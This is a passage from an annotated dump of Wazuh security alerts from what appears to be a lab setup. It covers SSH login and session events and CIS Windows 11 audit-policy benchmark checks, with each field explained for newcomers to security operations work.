CIS Critical Security Controls (CIS CSC) safeguards this check maps to – matches rule.cis_csc above.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"File Share"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

data.sca.check.previous_result:  not applicable
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

PAM: Login session closed.

🧠 What happened? PAM: Login session closed.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:44:14.534+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:14.534+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  PAM: Login session closed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5502
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['pam', 'syslog']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['7.8', '7.9']
UK GPG 13 (Good Practice Guide 13, protective monitoring) control mapping – compliance tag only, no bearing on severity.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AC.7']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534654.2354908
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:44:13.230035+00:00 server1 sshd[3349]: pam_unix(sshd:session): session closed for user simba
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  sshd
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:44:13.230035+00:00
Timestamp taken from the raw log line itself – compare with the top‑level timestamp to spot ingest or forwarding lag.

decoder.parent:  pam
Parent decoder used – for nested parsing.

decoder.name:  pam
Name of the Wazuh decoder that parsed this raw log.

data.dstuser:  simba
Target user of the PAM session – here the account whose sshd session was closed (see full_log).

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:44:19.058+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:19.058+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19014
Numeric ID of the detection rule that fired.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.6.3']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
CIS Critical Security Controls (CIS CSC) safeguard the rule maps to – the framework‑level counterpart of the benchmark ID in rule.cis.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534659.2355301
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26159
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to audit events generated by the management of task scheduler jobs or COM+ objects. For scheduler jobs, the following are audited: - Job created. - Job deleted. - Job enabled. - Job disabled. - Job updated. For COM+ objects, the following are audited: - Catalog object added. - Catalog object updated. - Catalog object deleted. The recommended state for this setting is: Success and Failure.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  The unexpected creation of scheduled tasks and COM+ objects could potentially be an indication of malicious activity. Since these types of actions are generally low volume, it may be useful to capture them in the audit logs for use during an investigation.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit Other Object Access Events
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.6.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  8.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"Other Object Access Events"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

data.sca.check.previous_result:  not applicable
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:44:22.725+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:22.725+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  11
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534662.2358595
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  16384
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:43:17.4781170Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2419
Incremental log record number – handy for timeline order.

data.win.system.processID:  16152
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
Text severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:31:17Z. Reason: RulesEngine."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  2025-04-25T22:31:17Z, RulesEngine
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

sshd: authentication success.

🧠 What happened? sshd: authentication success.

🔍 Why it's important: Moderate‑risk ATT&CK technique

🕒 2025-04-24T22:44:24.545+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access', 'Lateral Movement'] – ['Valid Accounts', 'Remote Services'] [T1078] [T1021]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

[Medium] T1021 – Remote Services

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:24.545+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  sshd: authentication success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5715
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078', 'T1021']
List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access', 'Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts', 'Remote Services']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'sshd', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AC.7']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534664.2360177
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:44:23.581338+00:00 server1 sshd[3411]: Accepted password for simba from 192.168.6.135 port 42842 ssh2
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  sshd
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:44:23.581338+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  sshd
Parent decoder used – for nested parsing.

decoder.name:  sshd
Name of the Wazuh decoder that parsed this raw log.

data.srcip:  192.168.6.135
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.srcport:  42842
Source TCP/UDP port seen – can confirm outbound SMB / RDP, etc.

data.dstuser:  simba
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Moderate‑risk ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

PAM: Login session opened.

🧠 What happened? PAM: Login session opened.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:44:24.545+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:24.545+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  PAM: Login session opened.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5501
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['pam', 'syslog', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['7.8', '7.9']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AC.7']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534664.2360644
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:44:23.585709+00:00 server1 sshd[3411]: pam_unix(sshd:session): session opened for user simba(uid=1000) by simba(uid=0)
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  sshd
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:44:23.585709+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  pam
Parent decoder used – for nested parsing.

decoder.name:  pam
Name of the Wazuh decoder that parsed this raw log.

data.srcuser:  simba
User on the originating host – watch for root / SYSTEM used remotely.

data.dstuser:  simba(uid=1000)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.uid:  0
Numeric user ID – pairs with username when name missing.

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Removable Storage' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Removable Storage' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:44:25.987+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:25.987+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Removable Storage' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19014
Numeric ID of the detection rule that fired.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.6.4']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534665.2361103
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26160
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit Removable Storage' is set to 'Success and Failure'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to audit user attempts to access file system objects on a removable storage device. A security audit event is generated only for all objects for all types of access requested. If you configure this policy setting, an audit event is generated each time an account accesses a file system object on a removable storage. Success audits record successful attempts and Failure audits record unsuccessful attempts. If you do not configure this policy setting, no audit event is generated when an account accesses a file system object on a removable storage. The recommended state for this setting is: Success and Failure. Note: A Windows 8.0, Server 2012 (non-R2) or newer OS is required to access and set this value in Group Policy.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Auditing removable storage may be useful when investigating an incident. For example, if an individual is suspected of copying sensitive information onto a USB drive.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit Removable Storage
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.6.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  8.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"Removable Storage"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

data.sca.check.previous_result:  not applicable
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Audit Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to passed

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Audit Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to passed

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:44:32.287+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:32.287+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Audit Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to passed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19015
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.7.1']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534672.2364815
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26161
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit Audit Policy Change' is set to include 'Success'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This subcategory reports changes in audit policy including SACL changes. Events for this subcategory include: - 4715: The audit policy (SACL) on an object was changed. - 4719: System audit policy was changed. - 4902: The Per-user audit policy table was created. - 4904: An attempt was made to register a security event source. - 4905: An attempt was made to unregister a security event source. - 4906: The CrashOnAuditFail value has changed. - 4907: Auditing settings on object were changed. - 4908: Special Groups Logon table modified. - 4912: Per User Audit Policy was changed. The recommended state for this setting is to include: Success.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Auditing these events may be useful when investigating a security incident.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Audit Policy Change
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.7.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  8.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"Audit Policy Change"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  passed
PASS or FAIL. Red = needs fixing.

data.sca.check.previous_result:  not applicable
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authentication Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to passed

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authentication Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to passed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:44:32.979+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:32.979+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authentication Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to passed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19015
Numeric ID of the detection rule that fired.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.7.2']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534672.2368099
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26162
Unique ID for this single check – copy to search historic runs.

